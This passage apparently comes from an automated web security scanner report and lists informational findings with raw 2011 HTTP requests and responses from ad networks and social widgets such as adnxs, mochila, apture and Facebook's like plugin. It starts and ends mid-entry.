You are being redirected, please follow <a href="http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&ref=http%3A%2F%2Fasthmatickitty.com%2F&linkcol=4285BB&bgcol=FFFFFF">this link to: http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&ref=http%3A%2F%2Fasthmatickitty.com%2F&linkcol=4285BB&bgcol=FFFFFF</a>!

Request 2

GET /EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB// HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 303 See Other
Date: Mon, 09 May 2011 14:07:47 GMT
Location: http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&linkcol=4285BB&bgcol=FFFFFF
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Set-Cookie: client_id=89BF2ADECF2086BD6F3E6B54B84F2B570EB278EE; domain=.bandcamp.com; path=/; expires=Sun, 09-May-2021 14:07:47 GMT
Connection: Keep-alive
Content-Length: 352

You are being redirected, please follow <a href="http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&linkcol=4285BB&bgcol=FFFFFF">this link to: http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&linkcol=4285BB&bgcol=FFFFFF</a>!
12.6. http://ib.adnxs.com/ttj  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ib.adnxs.com
Path:   /ttj

Request 1

GET /ttj?id=407559&pubclick=[INSERT_CLICK_TAG] HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:03:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgBIAEoATCw6J_uBBCw6J_uBBgB; path=/; expires=Sun, 07-Aug-2011 14:03:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 14:03:28 GMT
Content-Length: 629

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=fXkB9tGpyT99eQH20anJPwAAACAEVvI_fXkB9tGpyT99eQH20anJP0DNzz_fMb4vSsYda6b2ziUw9MdNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAsBAAAgMCAAUAAAAAniamrQAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949820%29%3Buf%28%27r%27%2C+184995%2C+1304949820%29%3B&cnd=!FyBHGgjC6AIQo6ULGAAg8dUBKAAxfXkB9tGpyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EKO5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au"></iframe>');

Request 2

GET /ttj?id=407559&pubclick=[INSERT_CLICK_TAG] HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgBIAEoATDG6J_uBBDG6J_uBBgB; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 14:03:50 GMT
Content-Length: 594

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=-U7MejGUyT_6Tsx6MZTJPwAAACAEVvI_-k7MejGUyT_5Tsx6MZTJP7kD6zF_uqt1SsYda6b2ziVG9MdNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAA3QsAAgMCAAUAAAAAoyaSpQAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949830%29%3Buf%28%27r%27%2C+184995%2C+1304949830%29%3B&cnd=!_R-rFAjC6AIQo6ULGAAg8dUBKAAx-U7MejGUyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EJ-4AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC"></iframe>');
12.7. http://oads.mochila.com/openx/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oads.mochila.com
Path:   /openx/www/delivery/ajs.php

Request 1

GET /openx/www/delivery/ajs.php?source=mochila_live&zoneid=167&mmadsize=300_140&widget=IBDtout&buyerId=OrlandoSentinel&destination=1596&cb=081922772 HTTP/1.1
Host: oads.mochila.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Cache-Control: private, max-age=0, no-cache
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CUR ADM OUR NOR STA NID"
Date: Mon, 09 May 2011 13:59:37 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: OAGEO=US%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=9eb743ef8885d18c9cf09de695a0ce63; expires=Tue, 08-May-2012 13:59:37 GMT; path=/
X-Powered-By: PHP/5.1.6
Content-Length: 1532

var OX_39787ffc = '';
OX_39787ffc += "<"+"script type=\"text/javascript\">\n";
OX_39787ffc += "RD = top.location.href.substr(7,top.location.href.indexOf(\'/\',7)-7);\n";
OX_39787ffc += "var _mbuyerId = \'SnapTimes\';\n";
OX_39787ffc += "try{_mbuyerId = mbuyerId;}catch(err){}\n";
OX_39787ffc += "if((_mbuyerId==\'\')||(_mbuyerId==\'unknown\')){_mbuyerId=RD;}\n";
OX_39787ffc += "_mchannelId = 13429;\n";
OX_39787ffc += "var mcmp = \'all_ibd_tout_widget\';\n";
OX_39787ffc += "m3_r = Math.floor(Math.random()*99999999999);\n";
OX_39787ffc += "document.write(\'<"+"iframe allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" src=\"http://admatch-syndication.mochila.com/viewer/channel/badgex?&asHtml=true&buyerId=\'+_mbuyerId+\'&channelId=\'+_mchannelId+\'&tid=10630&destination=&articleTemplateId=&badgeTemplateId=&widgetClass=&assetExcludeId=null&randomize=false&buid=1&rd=\'+RD+\'&mcmp=\'+mcmp+\'\" style=\"width:300px;height:140px;border:0px\"><"+"/iframe>\');\n";
OX_39787ffc += "<"+"/script><"+"div id=\'beacon_4304a2ffe0\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://oads.mochila.com/www/delivery/lg.php?bannerid=1051&amp;campaignid=185&amp;zoneid=167&amp;source=mochila_live&amp;loc=1&amp;referer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&amp;cb=4304a2ffe0\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
document.write(OX_39787ffc);

Request 2

GET /openx/www/delivery/ajs.php?source=mochila_live&zoneid=167&mmadsize=300_140&widget=IBDtout&buyerId=OrlandoSentinel&destination=1596&cb=081922772 HTTP/1.1
Host: oads.mochila.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Cache-Control: private, max-age=0, no-cache
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CUR ADM OUR NOR STA NID"
Date: Mon, 09 May 2011 13:59:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: OAGEO=US%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=41609c32b19ab33a6401744a19550398; expires=Tue, 08-May-2012 13:59:59 GMT; path=/
X-Powered-By: PHP/5.1.6
Content-Length: 1419

var OX_00092723 = '';
OX_00092723 += "<"+"script type=\"text/javascript\">\n";
OX_00092723 += "RD = top.location.href.substr(7,top.location.href.indexOf(\'/\',7)-7);\n";
OX_00092723 += "var _mbuyerId = \'SnapTimes\';\n";
OX_00092723 += "try{_mbuyerId = mbuyerId;}catch(err){}\n";
OX_00092723 += "if((_mbuyerId==\'\')||(_mbuyerId==\'unknown\')){_mbuyerId=RD;}\n";
OX_00092723 += "_mchannelId = 13429;\n";
OX_00092723 += "var mcmp = \'all_ibd_tout_widget\';\n";
OX_00092723 += "m3_r = Math.floor(Math.random()*99999999999);\n";
OX_00092723 += "document.write(\'<"+"iframe allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" src=\"http://admatch-syndication.mochila.com/viewer/channel/badgex?&asHtml=true&buyerId=\'+_mbuyerId+\'&channelId=\'+_mchannelId+\'&tid=10630&destination=&articleTemplateId=&badgeTemplateId=&widgetClass=&assetExcludeId=null&randomize=false&buid=1&rd=\'+RD+\'&mcmp=\'+mcmp+\'\" style=\"width:300px;height:140px;border:0px\"><"+"/iframe>\');\n";
OX_00092723 += "<"+"/script><"+"div id=\'beacon_9861d9dafc\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://oads.mochila.com/www/delivery/lg.php?bannerid=1051&amp;campaignid=185&amp;zoneid=167&amp;source=mochila_live&amp;loc=1&amp;cb=9861d9dafc\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
document.write(OX_00092723);
12.8. http://www.apture.com/js/apture.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.apture.com
Path:   /js/apture.js

Request 1

GET /js/apture.js?siteToken=pgKiQTB HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response 1

HTTP/1.0 200 OK
Expires: Mon, 09 May 2011 13:59:05 GMT
Last-Modified: Mon, 09 May 2011 13:59:05 GMT
Etag: "ec25c03593279e41a51488a37cd846db"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Content-Length: 3794
Date: Mon, 09 May 2011 13:59:05 GMT


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html";A.visitId=74532128726058;A.abtests={};A.userCookieId="QuDxqe1K4l";
A.aptureConfig = {
   magicLinks: {"status":207,"mlinks":[]}
};
A.siteToken="pgKiQTB";

A.capabilities=19718;
A.getPage=function(){return apture.make("Page", {ignored:{"deleted":{"27241857":1,"27241875":1},"url":{"http://media.indianasnewscenter.com/documents/WISE_privacy.pdf":1},"t":3},links:[{"linkType":0,"oI":null,"childLinks":[],"creationMode":2,"height":null,"linkText":"Twitter","caption":"","id":27241857,"title":"@inctoday","url":"http://twitter.com/inctoday","pageText":null,"mediaItem":{"extendedPrettySource":"Twitter Profile","itemInfo":"inctoday","sourceUrl":"http://twitter.com/inctoday","hash":"6442986459622746656","genericTMMThumbUrl":"tmm_tweet.gif?v1","title":"@inctoday","titleIcon":"badge_twitter.png","flexibleSize":false,"prettySource":"Twitter","_class":"TwitterArticle","linkIconY":1150,"topImage":apture.make("TwitterImage", {"thumbHeight":48,"sourceUrl":"http://a3.twimg.com/profile_images/198316951/twitter_pic_normal.jpg","hash":"-2818511726338247931","title":"Indiana's NewsCenter.jpg","url":"http://a3.twimg.com/profile_images/198316951/twitter_pic_normal.jpg","timestamp":1,"flexibleSize":false,"prettySource":"Twitter","licenseTemplates":"","height":48,"width":48,"caption":"","previewUrl":"http://a3.twimg.com/profile_images/198316951/twitter_pic_normal.jpg","forceLinkOnClick":false,"fullsizeThumb":false,"main":[],"copyrightNotice":"","thumbWidth":48,"source":"http://a3.twimg.com/profile_images/198316951/twitter_pic_normal.jpg"}),"genericThumbUrl":"nf_tweet.gif?v6","main":["itemInfo"],"id":22936602},"width":null,"token":"jIFMzDXY4x","plid":863426940,"display":{}},{"linkType":0,"oI":null,"childLinks":[],"creationMode":2,"height":null,"linkText":"Tweet","caption":"","id":27241875,"title":"@share","url":"http://twitter.com/share","pageText":null,"mediaItem":{"extend
...[SNIP]...

Request 2

GET /js/apture.js?siteToken=pgKiQTB HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response 2

HTTP/1.0 200 OK
Expires: Mon, 09 May 2011 13:59:06 GMT
Last-Modified: Mon, 09 May 2011 13:59:06 GMT
Etag: "bf541ce12ce20db098b30e48e400fb71"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Content-Length: 1537
Date: Mon, 09 May 2011 13:59:06 GMT


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="";A.visitId=165053501822643;A.abtests={};A.userCookieId="QuDxqe1K4l";
A.aptureConfig = {
   magicLinks: {"status":207,"mlinks":[]}
};
A.siteToken="pgKiQTB";

A.capabilities=19718;
A.getPage=function(){return apture.make("Page", {tmmLinks:[],id:0});};
A.siteId=206082;
A.maxPageLinks=200;
A.platformName="Unknown";
A.platformId=11;

A.barTitle="< Enter title >";
A.scrollOffset=99999999;
A.barColor="#444444";
A.barTitleColor="#ffffff";


A.siteSearchUrls=["http://indianasnewscenter.com/"];

A.shadowColor="#000000";

A.twitterHandle="Apture";




A.auto=1;

A.isApp=1;
//License terms: http://www.apture.com/license/
if(!B){ (function(s){var b=eval("(/*@cc_on!@*/0?(window.XMLHttpRequest/*@cc_on&&@_jscript_version>=5.7@*/?'ie7':null):(window.navigator.userAgent.toLowerCase().search(/iphone|ipad|android/)>-1)?null:(document.childNodes&&!document.all&&!navigator.taintEnabled)?'khtml':(document.getBoxObjectFor||(window.mozInnerScreenX===0||window.mozInnerScreenX))?'gecko':'unk')");if(b){s.type='text/javascript';s.charset='utf-8';s.src="http://cdn.apture.com/media/storage."+b+".v30596971.js";s.defer='true';(document.getElementsByTagName("head").item(0)||document.body).appendChild(s)}})(document.createElement('script')) }
else if(A.initApp)A.initApp();

}else{var i = A.prefs;
if(i&&(i.created||i.editing))alert("This page has multiple Apture script tags in the HTML template. Please remove all but one of them.")
}})();
12.9. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story&layout=button_count&show_faces=true&width=135&action=recommend&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.120.130
X-Cnection: close
Date: Mon, 09 May 2011 13:59:33 GMT
Content-Length: 7014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"83934688",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375286,vip:"66.220.146.11",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"282ea",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc7f3459db615008632004" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">3</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cells
...[SNIP]...

Request 2

GET /plugins/like.php?href=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story&layout=button_count&show_faces=true&width=135&action=recommend&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.244.124
X-Cnection: close
Date: Mon, 09 May 2011 13:59:45 GMT
Content-Length: 6926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"4695d6a8",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375286,vip:"66.220.146.11",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"282ea",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc7f35112aa50667364627" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Recommend</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">3</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cells
...[SNIP]...
12.10. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?api_key=158577044196953&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df251994bac%26origin%3Dhttp%253A%252F%252Fwww.nme.com%252Ff272cfc8b4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=258&href=http%3A%2F%2Fwww.facebook.com%2Fnmemagazine&locale=en_GB&sdk=joey&show_faces=true&stream=false&width=356 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
